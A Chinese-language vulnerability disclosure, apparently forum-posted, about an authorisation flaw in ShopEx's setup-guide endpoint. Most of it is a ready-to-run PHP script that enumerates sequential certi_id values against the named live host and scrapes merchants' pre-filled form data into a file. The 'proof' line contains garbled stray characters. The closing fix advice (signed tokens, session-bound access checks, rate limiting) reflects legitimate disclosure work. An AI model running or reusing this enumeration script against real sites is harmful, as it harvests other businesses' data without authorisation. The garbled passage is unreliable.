简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在 ShopEx 网店使用向导页面（guide.ecos.shopex.cn）:
http://guide.ecos.shopex.cn/step2.php?refer=…WlkaWFuLmNvbVwvIn0=（refer 参数值中间已省略）
refer 参数经 base64 解码（注意：base64 只是编码，不是加密，任何人都可以还原和重新构造）后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们只需修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站：certi_id 是一个顺序递增的数字 ID（下面的 PoC 从 1 依次尝试到 10000），从 PoC 的结果看，step2.php 并未校验请求方是否有权查看该 ID 对应的站点，只要能构造出对应的 refer 就能拿到页面中预填的表单字段（name/value）。
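<?php
// PoC driver: sweep candidate certi_id values against the ShopEx setup-guide
// endpoint. The sweep is ~10000 HTTP requests, so disable PHP's execution
// time limit in case this is run under a web SAPI rather than the CLI.
// Only run this against a system you are authorised to test.
set_time_limit(0);

$max_certi_id = 10000;   // upper bound is a guess; raise it if higher ids exist
for ($i = 1; $i < $max_certi_id; $i++) {
    ShowshopExD($i);
}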
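/**
 * Probe one certi_id against the ShopEx setup-guide endpoint and record the
 * pre-filled text inputs the page returns for it.
 *
 * The guide page takes a `refer` query parameter that is only base64 of a
 * small JSON object. Nothing in the request authenticates the caller, so an
 * arbitrary integer certi_id can be substituted -- that is the defect this
 * PoC demonstrates. A hit is detected by the page echoing our refer token
 * back in its body.
 *
 * @param int|string $cid     certi_id to probe; coerced with intval().
 * @param string     $outfile file that matching name:value pairs are appended to.
 * @return bool true when the response contained our refer token (a hit),
 *              false on a transport error or a miss.
 */
function ShowshopExD($cid, $outfile = 'c:/shopEx.txt') {
    $endpoint = 'http://guide.ecos.shopex.cn/step2.php';

    // Same JSON shape the site itself issues; callback_url is arbitrary here.
    $refer = base64_encode('{"certi_id":' . intval($cid) . ',"callback_url":"http:\/\/www.a.com\/"}');

    // base64 may contain '+', '/' and '='. A raw '+' in a query string is
    // decoded as a space by $_GET, so percent-encode the token; the server
    // side sees the original bytes either way.
    $url = $endpoint . '?refer=' . urlencode($refer);

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
    // Bound each probe so one slow id cannot stall the whole sweep.
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);

    $result = curl_exec($ch);
    $curl_err = curl_error($ch);
    curl_close($ch);

    // curl_exec() returns false on failure; the original passed that straight
    // into mb_convert_encoding() and strpos().
    if ($result === false) {
        echo 'certi_id ' . intval($cid) . ': request failed: ' . $curl_err . "\r\n";
        return false;
    }

    // Output console in the original is GB2312; the page itself is UTF-8.
    $result = mb_convert_encoding($result, "gb2312", "UTF-8");

    // strpos() returns 0 when the needle sits at offset 0, which the original
    // truthiness test would have treated as a miss; compare against false.
    if (strpos($result, $refer) === false) {
        return false;
    }

    $fp = fopen($outfile, 'ab');   // append so a restarted sweep keeps earlier hits
    if ($fp === false) {
        echo 'cannot open ' . $outfile . " for append\r\n";
        return true;
    }

    // Pull every self-closing text input and its name/value attributes.
    preg_match_all('/<input\stype="text"(.*?)\/>/', $result, $value);
    foreach ($value[1] as $attrs) {
        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/', trim($attrs), $res);
        if (empty($res[1])) {
            continue;   // input without both name= and value= in that order
        }
        $col = $res[1][0] . ':' . $res[3][0] . "\r\n";
        echo $col;
        fwrite($fp, $col, strlen($col));
    }

    echo '--------------------------------' . "\r\n";
    fclose($fp);
    flush();
    return true;
}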
?>
漏洞证明:
& E- L5 B; C$ h" l4 _& W. Jhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg' a4 Q3 n, g5 E9 `1 a
修复建议：refer 目前只是 base64 编码而非加密，但单纯“换成其他加密方式”仍然不够——只要客户端能拿到或猜出密文，遍历照样成立。服务端应对 refer 做签名（如带密钥的 HMAC）并在 step2.php 中校验签名与有效期；更根本的是校验当前请求方是否有权访问该 certi_id（把 certi_id 和已认证的会话/商户绑定，而不是信任 URL 里的值）；同时对该接口按来源 IP 做限速，避免顺序 ID 被批量枚举。